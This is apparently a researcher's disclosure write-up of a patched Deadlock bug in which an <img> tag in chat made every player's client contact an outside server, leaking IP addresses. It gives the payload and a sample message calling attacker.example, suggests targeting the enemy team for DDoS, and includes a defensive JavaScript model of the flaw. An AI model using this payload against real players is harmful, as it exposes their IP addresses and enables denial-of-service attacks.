Deadlock - Player IP address disclosure of the entire lobby

tl;dr - a specific Deadlock message would IP grab everyone in the lobby :^)

thanks oranges

Valve paid $1500 for the bug report, although Deadlock is not in scope for their program

if you want to read a more professionally written post, check out my other post on Happy Little Accidents, a research group that helped me write the report to Valve

what’s Deadlock?

Deadlock is a game made by Valve that is currently in closed beta, but anyone in the beta can invite unlimited friends, so it’s pretty popular

how do you do it?

by sending <img src="YOUR_SERVER"> within a chat message to Deadlock’s in-game all-chat, the client of anyone connected to the server would make an HTTP request to your server, giving you their IP address

the message in-game

pretty strange seeing as the image tags don’t render

what can you do with this?

you could just DDoS the enemy team

the message could be sent once in the team-only chat, and then once into the all-chat, resulting in enemy team IP addresses being deduced by checking which IP addresses showed up twice

demo?

sorry it’s very low resolution, the following gif shows me grabbing my own IP through the exploit, and shows the resulting HTTP request in my Burp instance:

demo

why does this work?

Valve’s Panorama UI framework stores its layout files as XML. when investigating with Rolly, from our understanding, html="true" on an element dictates whether the text within it is parsed and rendered as HTML. the following screenshot shows the GitHub commit (found on SteamDB’s Deadlock game tracker, look for the file citadel_hud_playerintents_player.xml) in which this attribute was removed from the chat layout file, patching the exploit:

the GitHub commit
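added example (not Valve’s or Panorama’s code): a small model of the html="true" behaviour described above, showing the patched plain-text rendering beside the vulnerable one and a pre-broadcast check a game server could run on chat. the tag parser is a simplified assumption, not Panorama’s, and attacker.example is a placeholder domain.

```javascript
// Added example, not Valve's code: a model of the Panorama chat bug.
// With html="true" a chat label parses the message as markup, so an
// <img src="..."> typed by one player makes every receiving client
// fetch that URL and reveal its IP. Without the attribute (the fix in
// the commit), the message is shown as plain text and nothing is fetched.
// The markup parser below is a simplified assumption, not Panorama's.

const TAG_RE = /<([a-zA-Z][\w:-]*)\b([^>]*)>/g;
const URL_ATTR_RE = /\b(src|href|poster)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/gi;

// Escape HTML metacharacters so a message is displayed, never parsed.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return s.replace(/[&<>"']/g, c => map[c]);
}

// Model of the two label configurations. Returns the text the client
// would display and the URLs it would request while displaying it.
function renderChatMessage(message, htmlEnabled) {
  if (!htmlEnabled) {
    return { text: escapeHtml(message), fetches: [] };   // patched behaviour
  }
  const fetches = [];
  for (const tag of message.matchAll(TAG_RE)) {
    for (const attr of tag[2].matchAll(URL_ATTR_RE)) {
      fetches.push(attr[2] ?? attr[3] ?? attr[4]);
    }
  }
  return { text: message, fetches };                      // vulnerable behaviour
}

// Defensive pre-broadcast check: URLs in markup that point off the game
// server, which a server could flag or strip before relaying the message.
function findExternalUrls(message) {
  return renderChatMessage(message, true).fetches
    .filter(u => /^(https?:)?\/\//i.test(u));
}

// Constructed sample message in the shape the write-up describes.
const sample = 'gg <img src="http://attacker.example/pixel.png"> ez';
console.log(renderChatMessage(sample, true).fetches);   // ["http://attacker.example/pixel.png"]
console.log(renderChatMessage(sample, false).fetches);  // []
```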

anything else?

the build description field was also vulnerable, as was the username field, which would trigger requests occasionally, but i couldn’t narrow down where it was being triggered from. this field was marked as a duplicate when we reported it

i also noticed that you could load a 10 GB+ image, which would cause spikes in internet traffic before the download was dropped, and in some cases this would crash the game client.

all fields have now been patched

after the payout but before publishing this write-up, a similar HackerOne report (shoutout wa) was brought to my attention which seems to confirm our reasoning for why this bug happens. that report is for a similar cross-site scripting vulnerability leading to remote code execution. however, as we could not get images to render in the in-game messages, i don’t believe RCE was possible through them. the build menu description tags did seem to render, so it is possible that RCE could have been achieved through the vulnerable build menu description field, but i can’t confirm this. it would have taken a lot of steps to get a victim to view the vulnerable field, and the build description field we reported was marked as a duplicate so we wouldn’t have gotten any money, but it still would have been cool to see it in action :(

2025 update: Valve eventually reintroduced this bug, and i tested whether RCE was possible. it was extremely sandboxed and i couldn’t get anything out of it

timeline

Itz-d0dgy completely carried the reporting and triage process as I had never done anything like this before. we reported it to Valve’s bug bounty program through HackerOne. the timeline with Valve is as follows:

  • August 22: Bug found and disclosed to Valve through HackerOne

  • August 23: HackerOne responds asking for details on the asset (Deadlock wasn’t in public beta yet), we respond with details

  • August 27: HackerOne asks for video PoC, PoC provided

  • August 29: HackerOne informs that this is being discussed internally with the Valve team

  • September 1: The less impactful vulnerable field is patched

  • September 10: We are thanked for the report and told the Deadlock team was already aware at the time we filed the report, we ask for clarification as the more impactful vulnerable field is still vulnerable. Report is marked as a duplicate.

  • September 13: Follow up asking for clarification as one issue is not patched

  • September 16: Follow up additionally inquiring for public disclosure

  • October 9: Follow up on whether both issues were known and if we can disclose publicly

  • October 11: The major vulnerable field is seemingly patched (as seen in the GitHub commit mentioned earlier)

  • October 12: Another follow up asking if we can disclose this publicly

  • October 15: Report is reopened;

    • “Two bugs in this issue; one was a dup, the other is not.”
    • “Deadlock is not in scope in our program; however this issue was interesting, and the team took action to mitigate, so we are issuing a bounty.”
    • Additional thanks for the report
    • We ask if we are able to request a CVE for this issue

Valve also mentioned in an email:

This game is in an unusual position right now. Obviously the game has a lot of players in its playtest, which is what makes reports like the one you filed interesting. But, the game is not public, and the game team is not comfortable adding it to our bug bounty program yet. The issue is interesting enough that we are going to issue a bounty for the second issue in the report. But we wanted to let you know that this does not mean Deadlock is fully supported on Valve's bounty program.

  • October 21: We ask for a follow-up on the CVE request, request public disclosure and note that as per HackerOne policy this will be publicly disclosed if no objection is raised within 30 days of the request

  • December 16: Still no response on the CVE request; blog posts published

thanks to:

  • Itz-d0dgy (Jack Moran)

helped so much with reporting and following up with Valve, helped me realize that this wasn’t just SSRF like i thought it was and that the IP the request came from was my real IP (i had just moved to a new place and didn’t recognize it), and helped me find the source of the original request when i couldn’t find where it had come from

  • Rolly (Conrad Draper)

investigated why <img> tags worked and <script> tags didn’t

  • Valve

for paying $1500 USD for an out-of-scope vulnerability where i just typed image tags in chat. please remember what they said: “this does not mean Deadlock is fully supported on Valve’s bounty program”